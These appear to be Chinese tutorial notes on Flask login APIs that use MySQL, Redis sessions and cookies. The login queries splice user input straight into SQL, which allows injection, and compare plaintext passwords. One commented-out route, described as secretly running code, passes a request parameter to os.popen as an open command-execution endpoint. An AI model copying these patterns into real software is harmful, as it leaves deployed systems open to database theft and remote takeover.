1、需求:接口输入用户名,密码后,成功登录(对比数据库)后,把session写到redis里面,返回session-value
server = flask.Flask(__name__) @server.route('/login1',methods=['post']) def login1(): username = flask.request.values.get('username','') password = flask.request.values.get('password','') sql = "select * from user WHERE username = '%s' and password ='%s';"%(username,password) res = op_mysql(sql)#函数的作用:操作mysql,查询的话,输出查询就结果,插入更新的话,更新数据库 if res: k = "sessionn:%s"%username v = str(time.time())+username #当前时间戳+用户名,然后md5一次,作为session session = md5_passwd(v)#加密 op_redis(k,session,expired=6000,db =2) #函数的作用:操作redis,传入k,v,期限,如果v存在,添加(k,v);如果v不存在,只传入key,判断是否有session,有的话返回值,没有的话返回None response = {"code":309,"msg":"登陆成功","session":session} else: response = {"code":308,"msg":"账户/密码错误"} return json.dumps(response,ensure_ascii=False) #return只能返回字符串
2、接口输入用户名,密码后,判断是否与数据库匹配,成功登录完之后,保存到浏览器cookie
server = flask.Flask(__name__) @server.route('/login1',methods=['post']) def login1(): username = flask.request.values.get('username','') password = flask.request.values.get('password','') sql = "select * from user WHERE username = '%s' and password ='%s';"%(username,password) res = op_mysql(sql) if res: k = "sessionn:%s"%username v = str(time.time())+username #当前时间戳+用户名,然后md5一次,作为session session = md5_passwd(v) op_redis(k,session,expired=6000,db =2) msg = {"code":309,"msg":"登陆成功","session":session} response = flask.make_response() #如果增加cookie的话,就用flask.make_response() response.set_data(json.dumps(msg,ensure_ascii=False)) response.set_cookie('session',session) # response.set_cookie('session-cm','cm的cookie') # set其他的值 # response.set_cookie('session-cmcmmm','cm的cookie1') # set其他的值 else: response = json.dumps({"code":308,"msg":"账户/密码错误"}) return response
3、操作cmd命令,偷偷执行代码,浏览器输入ls,就可以列出当前目录下的所有文件
# @server.route('/cmd',methods=['get']) # def cmd(): # command = flask.request.values.get('cmd') # if command: # res = os.popen(command).read() # return res
4、得到用户的双色球信息
# 详细需求:接口输入用户名,session值,验证是否匹配redis中对应用户名的session值,匹配的话,返回数据库所有的双色球信息
# 详细分析: 验证session是否正确,判断用户传过来的session和redis里面的是否一致
# 一致的话,返回双色球信息
# 不一致的话
# session不一样,提示非法
# session不存在,提示用户未登陆
# @server.route("/get_seq") # def get_seq(): # username = flask.request.values.get("username") # session = flask.request.values.get("session") #用户传过来的session # k = 'sessionn:%s'%username # redis_session = op_redis(k,db = 2) #redis取出的该用户的sessin值 # if redis_session: # if session == redis_session: #用户传入的sssion与redis保存一致 # response = op_mysql('select red,blue from seq;') # else: # response = {"code":101,"msg":"session非法!"} # else: # response = {"code":100,"msg":"用户未登录"} # return json.dumps(response,ensure_ascii=False)
# #接口中的session从cookie取值,不从浏览器输入flask.request.cookies.get
@server.route("/get_seq2") # def get_seq2(): # username = flask.request.values.get("username") # session = flask.request.cookies.get("session") #用户传过来的session # k = 'sessionn:%s'%username # redis_session = op_redis(k,db = 2) #redis取出的该用户的sessin值 # if redis_session: # if session == redis_session: #用户传入的sssion与redis保存一致 # response = op_mysql('select red,blue from seq;') # else: # response = {"code":101,"msg":"session非法!"} # else: # response = {"code":100,"msg":"用户未登录"} # return json.dumps(response,ensure_ascii=False)